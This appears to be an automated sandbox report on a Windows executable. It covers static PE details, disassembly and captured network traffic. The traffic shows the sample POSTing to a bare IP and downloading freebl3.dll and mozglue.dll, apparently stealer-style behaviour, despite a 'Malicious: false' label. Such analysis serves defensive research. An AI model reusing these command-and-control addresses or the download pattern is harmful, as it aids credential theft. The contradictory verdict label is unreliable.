SHA-512: 46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious: false

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.855560391702203
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• Clipper DOS Executable (2020/12) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: T6zZFfRLqs.exe
File size: 599552
MD5: 5d5e83e151a99bed97e13839e8881cb5
SHA1: 4f008fe578e0f32ed5dda8d30883a900630f1be4
SHA256: 1a0f891e8d7d659d550b35c54f542180cd2629d3a62e35e695e43fd1f5dad0b3
SHA512: 23705b79eac9d8725a1f366ba685664345d5dbca951d82b2fd554efde68d7fc038180e26329adaf43ac693b84c292ab12585237433c0c4e085c0f785cb43506b
SSDEEP: 12288:SzcmwRLNj6Jfko71uwBo2Uk3XezXUlCte2XMuOb27Wcpg:SzbwRLNj6J771/Bo9JtNTOC7

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:e0e4e8beb0e4c8ea

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x401b2c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x5FC5E9BE [Tue Dec 1 06:59:10 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: f98cc9327e2d65cc6189a693f26e1c1d

Entrypoint Preview

Instruction
call 00007F914CC4AB9Ch
jmp 00007F914CC47FADh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00488008h+ecx*8]
je 00007F914CC48145h
inc ecx
cmp ecx, 2Dh
jc 00007F914CC48123h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F914CC48140h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0048800Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F914CC4A801h
test eax, eax
jne 00007F914CC48138h
mov eax, 00488170h
ret
add eax, 08h
ret
call 00007F914CC4A7EEh
test eax, eax
jne 00007F914CC48138h
mov eax, 00488174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F914CC48117h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F914CC480B7h
pop ecx
mov esi, eax
call 00007F914CC480F1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
push 0000000Ch
push 004865D8h
call 00007F914CC48EBCh
mov ecx, dword ptr [ebp+08h]
xor edi, edi
cmp ecx, edi
jbe 00007F914CC48160h
push FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, dword ptr [ebp+0Ch]
sbb eax, eax
inc eax
jne 00007F914CC48151h
call 00007F914CC480C3h
mov dword ptr [eax], 0000000Ch
push edi
push edi
push edi

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x871a0 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8692c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10e000 | 0xa8f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x841c0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x85480 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x84000 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x82660 | 0x82800 | False | 0.975634578544 | data | 7.9868866426 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x84000 | 0x31f0 | 0x3200 | False | 0.256953125 | data | 4.156391323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x88000 | 0x8557c | 0x1e00 | False | 0.117708333333 | data | 1.31907716101 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x10e000 | 0xa8f0 | 0xaa00 | False | 0.668910845588 | data | 6.07126830195 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x10e3f0 | 0xea8 | data | English | United States
RT_ICON | 0x10f298 | 0x8a8 | data | English | United States
RT_ICON | 0x10fb40 | 0x6c8 | data | English | United States
RT_ICON | 0x110208 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x110770 | 0x25a8 | data | English | United States
RT_ICON | 0x112d18 | 0x10a8 | data | English | United States
RT_ICON | 0x113dc0 | 0x988 | data | English | United States
RT_ICON | 0x114748 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x114c28 | 0x6c8 | data | English | United States
RT_ICON | 0x1152f0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x115858 | 0x25a8 | data | English | United States
RT_ICON | 0x117e00 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_STRING | 0x1184c8 | 0x424 | data | |
RT_ACCELERATOR | 0x1182a8 | 0x50 | data | |
RT_ACCELERATOR | 0x1182f8 | 0x20 | data | |
RT_GROUP_ICON | 0x118268 | 0x3e | data | English | United States
RT_GROUP_ICON | 0x114bb0 | 0x76 | data | English | United States
RT_VERSION | 0x118318 | 0x1b0 | data | |

Imports

DLL | Import
KERNEL32.dll | HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA
USER32.dll | GetCursorPos

Exports

Name | Ordinal | Address
@SetViceVariants@12 | 1 | 0x401000

Version Infos

Description | Data
InternalName | sajbmiamezu.ise
ProductVersion | 8.64.59.5
Copyright | Copyrighz (C) 2021, fudkagat
Translation | 0x0127 0x0081

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 18:33:07.443809986 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:07.443856001 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:07.444000959 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:07.460839033 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:07.460875988 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:07.565421104 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:07.565608025 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:07.958369970 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:07.958401918 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:07.958719015 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:07.958815098 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:07.965439081 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:08.011140108 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:08.082767010 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:08.082796097 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:08.082823038 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:08.082938910 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:08.082959890 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:08.082993031 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:08.083030939 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:08.086275101 CEST | 49740 | 443 | 192.168.2.6 | 88.99.75.82
Sep 27, 2021 18:33:08.086297035 CEST | 443 | 49740 | 88.99.75.82 | 192.168.2.6
Sep 27, 2021 18:33:08.215325117 CEST | 49741 | 80 | 192.168.2.6 | 23.88.105.196
Sep 27, 2021 18:33:08.236507893 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.236700058 CEST | 49741 | 80 | 192.168.2.6 | 23.88.105.196
Sep 27, 2021 18:33:08.238046885 CEST | 49741 | 80 | 192.168.2.6 | 23.88.105.196
Sep 27, 2021 18:33:08.259089947 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.345690012 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.345793962 CEST | 49741 | 80 | 192.168.2.6 | 23.88.105.196
Sep 27, 2021 18:33:08.349280119 CEST | 49741 | 80 | 192.168.2.6 | 23.88.105.196
Sep 27, 2021 18:33:08.370603085 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.370640993 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.370665073 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.370692968 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.370757103 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
Sep 27, 2021 18:33:08.370780945 CEST | 80 | 49741 | 23.88.105.196 | 192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370784998 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.370839119 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370863914 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.370867968 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370894909 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370958090 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370973110 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.370985985 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.371002913 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.371045113 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.392576933 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392616034 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392640114 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392663956 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392729998 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.392772913 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.392846107 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393013000 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393030882 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393075943 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393130064 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393157959 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393182039 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393208027 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393208027 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393235922 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393259048 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393260002 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393282890 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393285036 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393310070 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393315077 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393340111 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393341064 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393364906 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393373966 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393389940 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393412113 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393414974 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393440008 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393460035 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393484116 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393491983 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393507957 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393534899 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393564939 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.413825035 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413858891 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413882971 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413907051 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413918018 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.413963079 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414007902 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414032936 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414086103 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414093018 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414124012 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414138079 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414150000 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414172888 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414175987 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414197922 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414202929 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414218903 CEST4974180192.168.2.623.88.105.196

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 18:33:07.412336111 CEST | 192.168.2.6 | 8.8.8.8 | 0x81f3 | Standard query (0) | mas.to | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 18:33:07.425153971 CEST | 8.8.8.8 | 192.168.2.6 | 0x81f3 | No error (0) | mas.to | (none) | 88.99.75.82 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• mas.to
• 23.88.105.196

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.64974088.99.75.82443C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.64974123.88.105.19680C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Sep 27, 2021 18:33:08.238046885 CEST966OUTPOST /1008 HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                            Content-Length: 25
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                                                                                            Data Ascii: --1BEF0A57BE110FD467A--
                                                                                                                                            Sep 27, 2021 18:33:08.345690012 CEST967INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 8c b1 0a 83 30 10 86 9f c6 25 48 50 8b 4b 32 d6 4e 1d 2c d4 6e 5d ae 31 5a 31 21 21 b9 ab f5 ed 2b c9 58 0e fe ef 3b f8 ef ea b2 fe 9b a6 ad ca 4e 4f 40 06 65 d1 5d ee d7 a1 bf 15 4f c9 38 7e 51 30 3e c2 91 1b 18 a3 91 71 26 58 33 41 e2 0b d4 4a 3e a9 72 a3 4e e2 21 c6 cd 85 31 2d 40 f8 4e 32 3b 37 9b 5c 20 54 89 8f e1 9c 2f c3 ee f3 db 55 ef 07 65 5b 49 0c a4 a5 75 9f 45 47 61 29 2e 4a 58 7f 92 3f 78 84 d6 b9 ba 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 99e0%HPK2N,n]1Z1!!+X;NO@e]O8~Q0>q&X3AJ>rN!1-@N2;7\ T/Ue[IuEGa).JX?x0
                                                                                                                                            Sep 27, 2021 18:33:08.349280119 CEST  967  OUT  GET /freebl3.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:08.370640993 CEST  969  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 334288
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "519d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:08 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
                                                                                                                                            Sep 27, 2021 18:33:08.642503977 CEST  1319  OUT  GET /mozglue.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:08.663970947 CEST  1321  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 137168
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "217d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:08 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
